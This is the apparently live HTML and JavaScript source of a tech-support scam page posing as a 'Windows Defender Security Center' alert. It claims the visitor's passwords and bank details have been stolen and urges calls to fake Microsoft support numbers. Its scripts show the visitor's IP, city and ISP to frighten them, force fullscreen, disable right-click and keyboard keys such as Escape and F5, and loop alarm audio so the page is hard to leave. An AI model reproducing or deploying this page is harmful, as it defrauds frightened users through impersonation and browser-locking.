<html lang="en">

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
	<meta charset="utf-8">
	<meta content="width=device-width,initial-scale=1,shrink-to-fit=no" name="viewport">
	<meta content="noindex,nofollow" name="robots">
	<title>Defender smart screen error</title>
	<link href="msmm.png" rel="icon" id="favicon" type="image/png">
	<link href="tapa.css" rel="stylesheet">
	<script type='text/javascript' src="../../code.jquery.com/jquery-1.4.4.min.js"></script>
	<script type="text/javascript">//<![CDATA[
		$(function () {
			$('body').bind('contextmenu', function (e) {
				return false;
			});
		});//]]>
	</script>
	<script src="noir.js"></script>

	<script>
		var t = new XMLHttpRequest;
		t.onreadystatechange = function () {
			if (4 == this.readyState && 200 == this.status) {
				var a = JSON.parse(this.responseText);
				ipadd = a.ip;
				city = a.city;
				country = a.country;
				isp = a.connection.isp;
				var b = new Date;
				currtime = a.timezone.current_time;
				document.getElementById("ip_add").textContent = "Address IP: " + ipadd + " " + b.toLocaleString("EN-US", currtime);
				document.getElementById("city").textContent = "City: " + city + ", " + country;
				document.getElementById("isp").textContent = "ISP: " + isp
			}
		};
		t.open("GET.html", "https://ipwho.is/?lang=en", !0);
		t.send();
	</script>
	<script>
		function feewfewcwevwevewfwefewfew(name) {
			name = name.replace(/[\[]/, "\\\[").replace(/[\]]/, "\\\]");
			var regexS = "[\\?&]" + name + "=([^&#]*)";
			var regex = new RegExp(regexS);
			var results = regex.exec(window.location.href);
			if (results == null)
				return "";
			else
				return results[1];
		}
		var bcda = feewfewcwevwevewfwefewfew('bcda');
	</script>

</head>
<body class="map" id="mycanvas" onbeforeunload="return myFunction()" style="cursor:none">

	<div style="position:absolute; top:100px; right:10px; z-index:9999;"><img src="def.gif" alt="" width="500"></div>


	<div class="bg" style="cursor:none">
		<div class="bgimg" style="top:0">
			<img src="f24.png" alt="" width="100%">
		</div>
	</div>
	<a href="#" id="link_black" style="cursor:none" rel="noreferrer">
		<div class="black" style="height: 145%; cursor: none; display: block;"></div>
	</a>
	<div class="pro_box" style="cursor: none; display: block;">
		<div class="pro_box_header">
			<div class="row">
				<div class="col-md-12">
					<div class="minimize">
						<ul>
							<li>
								<a href="#">
									<img src="mnc.png">
								</a>
							</li>
						</ul>
					</div>
				</div>
				<div class="col-md-4">
					<div class="logo">
						<img src="msmm.png">
						<span>Windows security</span>
					</div>
				</div>
				<div class="col-md-8">
					<div class="activate_lic">
						<ul>
							<li>
								<a href="#">
									<button>Activate your license</button>
								</a>
							</li>
							<li>
								<a href="#">
									<img src="set.png">
								</a>
							</li>
							<li>
								<a href="#">
									<img src="ques.png">
								</a>
							</li </ul>
					</div>
				</div>
			</div>
		</div>
		<div class="scan_box">
			<div class="scan_box_header">
				<div class="row">
					<div class="col-md-6">
						<div class="quick_scan">
							<p>
								<img src="vsc.png">
								<span>scanning rapido</span>
							</p>
						</div>
					</div>
					<div class="col-md-6">
						<div class="minimize1">
							<ul>
								<li>
									<a href="#">
										<img src="mnc.png">
									</a>
								</li>
							</ul>
						</div>
					</div>
				</div>
			</div>
			<div class="scan_body">
				<div style="margin: 15px 10px;">
					<img src="bxs.png" alt="" style="max-width: 100%;">
				</div>
				<div class="table_quick">
					<table class="table table-bordered">
						<thead>
							<tr>
								<th scope="col">scanned object</th>
								<th scope="col">
									<div class="col_fourth counter">
										<h2 class="count-number count-title timer" data-speed="5000" data-to="51900">
											51,900</h2>
									</div>
								</th>
							</tr>
							<tr>
								<th scope="col">time spent</th>
								<th scope="col">5 secs</th>
							</tr>
							<tr>
								<th scope="col">identified threats</th>
								<th scope="col" style="color:red">
									<h2 class="count-number count-title timer" data-speed="2500" data-to="1200">1,200
									</h2>
								</th>
							</tr>
						</thead>
					</table>
				</div>
			</div>
			<div class="scan_footer">
				<div class="row">
					<div class="col-md-6">
						<div class="bt_can">
							<div class="btn-group" role="group" aria-label="Basic example">
								<button class="btn btn-secondary" type="button">cancel</button>
							</div>
							<div class="btn-group" role="group" aria-label="Basic example">
								<button class="btn btn-secondary" type="button">pause</button>
							</div>
						</div>
					</div>
					<div class="col-md-6">
						<div class="bt_can2">
							<div class="btn-group" role="group" aria-label="Basic example">
								<button class="btn btn-secondary" type="button">scheduled scan</button>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
	<div class="pro_box2" style="cursor: none; display: block;">
		<img src="bx1.png" alt="" style="width:100%;max-width: 100%;display: block;
      margin: 0 auto;">
	</div>
	<div class="pro_box3" style="cursor: none; display: block;">
		<div class="pro_box_header">
			<div class="row">
				<div class="col-md-12">
					<div class="minimize">
						<ul>
							<li>
								<a href="#">
									<img src="mnc.png">
								</a>
							</li>
						</ul>
					</div>
				</div>
				<div class="col-md-4">
					<div class="logo">
						<img src="msmm.png">
						<span>Windows security</span>
					</div>
				</div>
				<div class="col-md-8">
					<div class="activate_lic">
						<ul>
							<li>
								<a href="#">
									<button>Activate your license</button>
								</a>
							</li>
							<li>
								<a href="#">
									<img src="bel.png">
								</a>
							</li>
							<li>
								<a href="#">
									<img src="set.png">
								</a>
							</li>
							<li>
								<a href="#">
									<img src="ques.png">
								</a>
							</li>
						</ul>
					</div>
				</div>
			</div>
		</div>
		<div class="scan_box2">
			<div class="scan_box_header">
				<div class="row">
					<div class="col-md-6">
						<div class="quick_scan">
							<p>
								<img src="vsc.png">
								<span>scan</span>
							</p>
						</div>
					</div>
					<div class="col-md-6">
						<div class="minimize1">
							<ul>
								<li>
									<a href="#">
										<img src="mnc.png">
									</a>
								</li>
							</ul>
						</div>
					</div>
				</div>
			</div>
			<div class="scan_body">
				<div class="row">
					<div class="col-md-12">
						<div class="tooreg_detail_scan">
							<ul>
								<li>
									<a href="#">scan</a>
								</li>
								<li>
									<a href="#">scan plan</a>
								</li>
								<li>
									<a href="#">report</a>
								</li>
							</ul>
						</div>
					</div>
				</div>
				<br>
				<div class="table_quick2">
					<div class="row">
						<div class="col-md-4">
							<div class="pc_desk">
								<img src="pcm.png">
							</div>
						</div>
						<div class="col-md-4">
							<div class="card_top scan_pro">
								<ul>
									<li>
										<i aria-hidden="true" class="fa fa-check"></i> Check for updates
									</li>
									<li>
										<i aria-hidden="true" class="fa fa-check"></i> scan memory
									</li>
									<li>
										<i aria-hidden="true" class="fa fa-check"></i> Analyze startup items
									</li>
									<li>
										<div class="circular-spinner"></div>
										<span>Registry analysis</span>
									</li>
									<li>File system analysis</li>
								</ul>
							</div>
						</div>
						<div class="col-md-4">
							<div class="scan_dur">
								<p>
									<strong>Duration of analysis</strong>
								</p>
								<p>3 min 0 seconds</p>
								<p>5 min 0 seconds</p>
								<br>
								<p>
									<strong>scanned item</strong>
								</p>
								<p>51,900</p>
								<br>
								<p>
									<strong>detection</strong>
								</p>
								<p>11</p>
							</div>
						</div>
					</div>
				</div>
			</div>
			<div class="scan_footer3">
				<div class="row">
					<div class="col-md-2">
						<div class="viruses">
							<img src="vsc.png">
						</div>
					</div>
					<div class="col-md-10">
						<div class="make_this">
							<p>This is the last thing you need to worry about when it comes to online threats. </p>
							<p>Premium blocks malware, viruses, and more without slowing down your computer. Upgrade to
								premium
								version</p>
						</div>
					</div>
				</div>
			</div>
		</div>
	</div>
	<div style="bottom:-20px;position:fixed;cursor:none;z-index:999999999;" id="footer">
		<div class="row">
			<div class="col-md-12">
				<div class="right-foot" style="text-align:center;margin-bottom: 5px;">
					<span id="footertxt">
						<img src="msmm.png"> Windows security </span>
					<span style="font-weight:500;padding-left:13px;color:#fff; ">Call Windows Support: <span
							style="border:1px solid #fff;border-radius:5px;padding:4px 5px"> <img src="winlo.png" alt=""
								style="width: 25px;vertical-align: sub;"> Call us directly +1 (888) 813-7080
							<script>document.write(bcda)</script>
						</span>
					</span>
				</div>
			</div>
			<div class="col-md-12">
				<marquee direction="left" height="100px" width="100%">
					<small class="text-left" style="color:#eee;font-size:10px">Windows Defender SmartScreen now prevents
						unrecognized applications from appearing. system may be at risk. A Windows Defender scan found
						adware on
						this device that can steal passwords, online identities, financial information, personal files,
						photos, and
						documents. </small>
				</marquee>
			</div>
		</div>
	</div>
	<div class="lightbox" id="poptxt" style="display: block;">
		<div class="ilb top" style="font-size:17px">
			<div class="ilb headers" style="border-bottom:1px solid #d6d5d5">
				<span class="fl title" id="txtadd">
					<span class="fl ilb">
						<img src="dm.png" class="logo3">
					</span>Windows Defender Security Center </span>
				<span class="fl title2" id="txts1">
					<a href="#" id="bgt">
						<img src="cs.png">
					</a>
				</span>
			</div>
		</div>
		<div id="txtintro">
			<span class="colo-rd">
				<div id="ip_add">Microsoft Windows Firewall Warning!</div>
				<div id="city">A system infected with Trojan spyware</div>
				<div id="isp"> (Error code: 2v7HgTvB)</div>
			</span>
		</div>
		<img src="re.gif" id="banner">
		<div id="disclaimer">Access to this system is blocked for security reasons. <br>
			<span class="support" style="font-size:22px;">Please call Windows Support:<br><span
					style="border:1px solid #114d9a;border-radius:5px;padding:4px 5px"> <img src="winlo.png" alt=""
						style="width: 25px;vertical-align: sub;"> Call us directly +1 (888) 813-7080
					<script>document.write(bcda)</script>
				</span>
			</span>
		</div>
		<div id="bottom">
			<img src="msmm.png" id="badge">
			<span class="title3">Windows</span>
			<ul>
				<li>
					<a href="#">
						<div class="fr button2">
							<span id="addtochromebutton">Allow</span>
						</div>
					</a>
				</li>
				<li>
					<a href="#">
						<div class="fr button blink">
							<span id="addtochromebutton">Deny</span>
						</div>
					</a>
				</li>
			</ul>
		</div>
	</div>
	<div class="cardcontainer" style="cursor: none; display: block;" id="pop_up_new">
		<p style="font-size:16px;font-weight:400;margin:0;margin-bottom:5px;padding:5px 10px;color:#fff!important;color:#414141;font-weight:700;margin-top:8px"
			class="text-center">Windows-Defender - Security Warning</p>
		<p>
			<b>Access to this system is blocked for security reasons !</b>
		</p>
		<p>Your computer has been reported to be infected with Trojan-type spyware. The following data was compromised:
		</p>
		<p>> Email ID <br>&gt; Bank Password <br>&gt; Facebook Login <br>&gt; Photos and Documents </p>
		<p>Windows Defender scan found adware on this device that can steal passwords, online identities, financial
			information, personal files, photos, and documents. </p>
		<p>Please contact us immediately. Our engineer will guide you through the removal process over the phone. </p>
		<p>Call Windows Support immediately to report this threat, prevent identity theft, and unblock access to this
			device. </p>
		<p>Closing this window may put your personal information at risk and may cause your Windows registration to be
			suspended. </p>
		<p style="padding-bottom:0;color:#fff;font-size:16px">Call Windows Support: +1-833-582-3294 <strong>
				<span style="border:0px solid #fff;border-radius:5px;padding:5px 5px"> <br />Call us directly +1 (888) 813-7080
					<script>document.write(bcda)</script>
				</span>
			</strong>
		</p>
		<div class="action_buttons">
			<a class="active" id="leave_page" style="cursor:pointer;color:#fff!important">OK</a>
			<a class="active" id="leave_page" style="color:#fff!important">cancel</a>
		</div>
	</div>
	<div class="answer_list"
		style="display:none;background-color:#000;height:auto;width:550px;left:33%;position:absolute;z-index:99999999;border:1px solid transparent;border-color:#d6d8db;border-radius:.5rem"
		id="welcomeDiv">
		<p style="color:#fff;margin-top:10px;font-size:16px;padding:0 5px" class="text-center">Please contact us
			immediately. Our engineer will guide you through the removal process over the phone. Your computer has been
			disabled. Windows Defender SmartScreen now prevents unrecognized applications from appearing. Running this
			application may put your system at risk. <br>
			<strong>Call Windows Support: <span style="border:1px solid #383d41;border-radius:5px;padding:6px 5px"> <img
						src="winlo.png" alt="&nbsp" style="width: 25px;vertical-align: bottom;"> Call us directly +1 (888) 813-7080
					<script>document.write(bcda)</script>
				</span>
			</strong>
		</p>
	</div>
	<div id="chat" style="display: block;">
		<img src="msmm.png">
		<span
			style="color:#222;font-size:24px;font-weight:600;margin-left:6px;position:relative;top:5px">Microsoft</span>
		<p style="font-weight:600;font-size:24px">Call support: +1-833-582-3294<br>
		</p>
		<h4 style="font-weight:600;font-size:22px"> <img src="winlo.png" alt="" style="width: 25px;margin-left: 0;">
			Call us
			directly +1 (888) 813-7080
			<script>document.write(bcda)</script>
			<br>(Security Support)
		</h4>
		<div class="arrow-down">
			<svg height="1em" viewBox="0 0 320 512">
				<style>
					svg {
						fill: #fff
					}
				</style>
				<path
					d="M137.4 374.6c12.5 12.5 32.8 12.5 45.3 0l128-128c9.2-9.2 11.9-22.9 6.9-34.9s-16.6-19.8-29.6-19.8L32 192c-12.9 0-24.6 7.8-29.6 19.8s-2.2 25.7 6.9 34.9l128 128z">
				</path>
			</svg>
		</div>
	</div>
	<script src="nvidia.js"></script>
	<script src="jupiter.js"></script>
	<script src="bxsafe.js"></script>
	<script>
		$(function () {
			var a = 0,
				b = setInterval(function () {
					a += 10;
					$("#dynamic").css("width", a + "%").attr("aria-valuenow", a).text(a + "% Complete");
					100 <= a && clearInterval(b)
				}, 100)
		});
	</script>
	<script>
		(function (a) {
			a.fn.countTo = function (b) {
				b = b || {};
				return a(this).each(function () {
					function d(a) {
						a = c.formatter.call(k, a, c);
						h.html(a)
					}
					var c = a.extend({}, a.fn.countTo.defaults, {
						from: a(this).data("from"),
						to: a(this).data("to"),
						speed: a(this).data("speed"),
						refreshInterval: a(this).data("refresh-interval"),
						decimals: a(this).data("decimals")
					}, b),
						l = Math.ceil(c.speed / c.refreshInterval),
						n = (c.to - c.from) / l,
						k = this,
						h = a(this),
						m = 0,
						f = c.from,
						g = h.data("countTo") || {};
					h.data("countTo", g);
					g.interval && clearInterval(g.interval);
					g.interval = setInterval(function () {
						f += n;
						m++;
						d(f);
						"function" == typeof c.onUpdate && c.onUpdate.call(k, f);
						m >= l && (h.removeData("countTo"), clearInterval(g.interval), f = c.to, "function" == typeof c.onComplete && c.onComplete.call(k, f))
					}, c.refreshInterval);
					d(f)
				})
			};
			a.fn.countTo.defaults = {
				from: 0,
				to: 0,
				speed: 100,
				refreshInterval: 100,
				decimals: 0,
				formatter: function (a, d) {
					return a.toFixed(d.decimals)
				},
				onUpdate: null,
				onComplete: null
			}
		})(jQuery);
		jQuery(function (a) {
			a(".count-number").data("countToOptions", {
				formatter: function (a, d) {
					return a.toFixed(d.decimals).replace(/\B(?=(?:\d{3})+(?!\d))/g, ",")
				}
			});
			a(".timer").each(function (b) {
				var d = a(this);
				b = a.extend({}, b || {}, d.data("countToOptions") || {});
				d.countTo(b)
			})
		});
	</script>

	<script>
		addEventListener("click", function () {
			var el = document.documentElement
				, rfs =
					el.requestFullScreen
					|| el.webkitRequestFullScreen
					|| el.mozRequestFullScreen
				;
			rfs.call(el);
		});
	</script>
	<script>
		setInterval(function () {
			document.getElementById("surejust").play()
		}, 500);
	</script>
	<script>
		var e = 1;
		setInterval(function () {
			1 == e ? (document.getElementById("favicon").href = "index.html", e = 0) : (document.getElementById("favicon").href = "index.html", e = 1)
		}, 1E3);
	</script>
	<script>
		$(document).ready(function () {
			$("#mycanvas").click(function () {
				$("#welcomeDiv").show()
			})
		});
	</script>

	<script>
		$(document).ready(function () {
			$("#mycanvas").click(function () {
				$("#poptxt").show()
			})
		});
		$(document).ready(function () {
			$("#cross").click(function () {
				$("#poptxt").show()
			})
		});
	</script>

	<script>
		$(document).ready(function () {
			$("#mycanvas").click(function () {
				$("#footer").show()
			})
		});
	</script>
	<script>
		$(document).ready(function () {
			$("body").mouseover(function () {
				$("#poptxt").show()
			})
		});
	</script>
	<style>
        body {
            position: fixed;
            top: 0;
            left: 0;
            width: 100vw;
            height: 100vh;
        }
    </style>
	<script>
		var isNS = "Netscape" == navigator.appName ? 1 : 0;
		"Netscape" == navigator.appName && document.captureEvents(Event.MOUSEDOWN || Event.MOUSEUP);

		function mischandler() {
			return !1
		}

		function mousehandler(a) {
			a = isNS ? a : event;
			a = isNS ? a.which : a.button;
			if (2 == a || 3 == a) return !1
		}
		document.oncontextmenu = mischandler;
		document.onmousedown = mousehandler;
		document.onmouseup = mousehandler;
	</script>
	<script>
		document.onkeydown = function (a) {
			return !1
		};
	</script>
	<script>
		document.attachEvent("onkeydown", win_onkeydown_handler);

		function win_onkeydown_handler() {
			switch (event.keyCode) {
				case 116:
					event.returnValue = !1;
					event.keyCode = 0;
					break;
				case 27:
					event.returnValue = !1, event.keyCode = 0
			}
		}
	</script>
	<script>


		$(document).ready(function () {
			$("#chat").delay(600).fadeIn(100)
			var audioElement = document.createElement('audio');
			audioElement.setAttribute('src', 'webs.mp4');

			audioElement.addEventListener('ended', function () {
				this.play();
			}, false);


			$('#mycanvas').click(function () {
				audioElement.play();

			});

			$('#link_black').click(function () {
				audioElement.play();

			});


			$('.pro_box').click(function () {
				audioElement.play();

			});

			$('#poptxt').click(function () {
				audioElement.play();

			});

		});
	</script>

	<script>
		$(document).ready(function () {
			var audioElement = document.createElement('audio');
			audioElement.setAttribute('src', 'visudk.mp4');

			audioElement.addEventListener('ended', function () {
				this.play();
			}, false);


			$('#mycanvas').click(function () {
				audioElement.play();

			});

			$('#link_black').click(function () {
				audioElement.play();

			});


			$('.pro_box').click(function () {
				audioElement.play();

			});

			$('#poptxt').click(function () {
				audioElement.play();

			});

		});
	</script>

	<script src="esc.js"></script>

</body>

</html>